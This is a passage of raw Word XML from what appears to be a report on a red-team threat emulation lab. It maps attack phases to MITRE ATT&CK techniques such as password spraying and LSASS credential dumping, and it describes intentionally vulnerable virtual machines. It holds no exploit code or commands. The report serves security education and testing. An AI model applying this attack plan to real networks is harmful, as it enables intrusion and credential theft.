          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00A000BA" w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>3 Threat Emulation Plan and MITRE ATT&amp;CK Mapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6438427F" w14:textId="07BA0F62" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00053404" w:rsidP="004F0197">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00053404">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00A000BA" w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>3.1 Threat Actor Profile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5BF60D" w14:textId="3174EB51" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00F16CB9"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F16CB9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">The virtual opponent is a financially-driven cyber-criminal group with an average level of technical advancement, where customer databases and authentication keys are </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F16CB9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>monetised</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F16CB9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> [20]. The threat model includes initial access via exploitation of web application, subsequent internal network reconnaissance, privilege escalation and credential harvesting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFB2A7D" w14:textId="67AC011D" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00053404" w:rsidP="004F0197">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00053404">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00A000BA" w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>3.2 Attack Phases and MITRE ATT&amp;CK TTPs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D99C81D" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA"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b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Phase 1: Reconnaissance and Initial Access (OWASPBWA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9EDE0B" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA" w:rsidP="004F0197">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:num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kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>T1595.002 (Vulnerability Scanning)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB94036" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA" w:rsidP="004F0197">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:num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kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>T1190 (Exploit Public-Facing Application)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E126F8" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA" w:rsidP="004F0197">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:num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kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>T1059.004 (Unix Shell)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA0B948" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA"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b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Phase 2: Privilege Escalation and Persistence (Metasploitable)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F0DA0B" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA" w:rsidP="004F0197">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:num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kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>T1210 (Exploitation of Remote Services)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E9BE80" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA" w:rsidP="004F0197">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:num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kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>T1068 (Exploitation for Privilege Escalation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3DFA8F" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA" w:rsidP="004F0197">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:num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kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>T1053.003 (Scheduled Task/Job: Cron)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC2136B" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA"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b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Phase 3: Credential Access and Lateral Movement (Windows Server 2019)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596FD70C" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA" w:rsidP="004F0197">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>T1110.003 (Password Spraying)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3299C5C5" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA" w:rsidP="004F0197">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>T1021.002 (Remote Services: SMB/Windows Admin Shares)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5044EB4F" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA" w:rsidP="004F0197">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>T1003.001 (OS Credential Dumping: LSASS Memory)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F04203E" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA" w:rsidP="004F0197">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>T1078.002 (Valid Accounts: Domain Accounts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F0A5CA" w14:textId="0A3AC90B" w:rsidR="00A000BA" w:rsidRDefault="00F16CB9" w:rsidP="004F0197">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F16CB9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Success Criteria: </w:t>
      </w:r>
      <w:r w:rsidRPr="00F16CB9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Exfiltration of a database out of OWASPBWA, root-level persistence on Metasploitable, and acquisition of domain administrator credentials out of Windows Server 2019.</w:t>
      </w:r>
      <w:r w:rsidR="00A000BA" w:rsidRPr="00F16CB9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C9DFEB" w14:textId="54AF2227" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00053404" w:rsidP="004F0197">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00A000BA" w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>4 Laboratory Environment Design</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A01663" w14:textId="26D15646" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00053404" w:rsidP="004F0197">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00053404">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00A000BA" w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>4.1 Network Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F87898A" w14:textId="643E3516" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00F16CB9"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F16CB9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">The laboratory setup includes four </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F16CB9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>virtualised</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F16CB9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> machines, which are connected to an isolated subnet (192.168.227.0/24), which does not allow unintentional external network communication, but allows realistic internal propagation of attacks [21].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB4481B" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA"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b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Network Diagram</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCF278F" w14:textId="429368F4" w:rsidR="007864B5" w:rsidRDefault="007864B5" w:rsidP="007864B5">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58C58059" wp14:editId="576C8FB4">
            <wp:extent cx="4743450" cy="2530875"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="1049773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51705" cy="2535280"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F8685A" w14:textId="3E31F9CD" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00053404" w:rsidP="004F0197">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00053404">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00A000BA" w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>4.2 Virtual Machine Specifications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C83160" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA" w:rsidP="007864B5">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="0"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b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>VM-1 (Windows Server 2019 — AD Domain Controller)</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331B2F08" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA" w:rsidP="007864B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0"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kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Hostname: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>DC01.abcd.local</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="34E802D3" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA" w:rsidP="007864B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="0"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kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Role: Active Directory Domain Services, DNS, File Sharing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C125FA" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA" w:rsidP="007864B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="0"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kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Vulnerabilities: Weak password policies, SMB signing disabled, outdated patch level</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DAD30A" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA" w:rsidP="007864B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="0"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kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Services: LDAP (389), SMB (445), RDP (3389), Kerberos (88)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDF2410" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA" w:rsidP="007864B5">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="0"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b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>VM-2 (OWASPBWA — Web Application Server)</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77775632" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA" w:rsidP="007864B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0"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kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Operating System: Ubuntu Linux 12.04</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3832BAF2" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA" w:rsidP="007864B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0"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kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Services: Apache, MySQL, Multiple vulnerable web applications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3A9648" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA" w:rsidP="007864B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="0"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kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Vulnerabilities: SQL injection, command injection, authentication bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA3FCC2" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA" w:rsidP="007864B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="0"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kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Applications: DVWA, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Mutillidae</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>WebGoat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7D246595" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA" w:rsidP="007864B5">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="0"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b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>VM-3 (Metasploitable — Legacy Service Host)</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7859ED6D" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA" w:rsidP="007864B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="0"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kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Operating System: Ubuntu Linux 8.04</w:t>
      </w:r>
    </w:p>
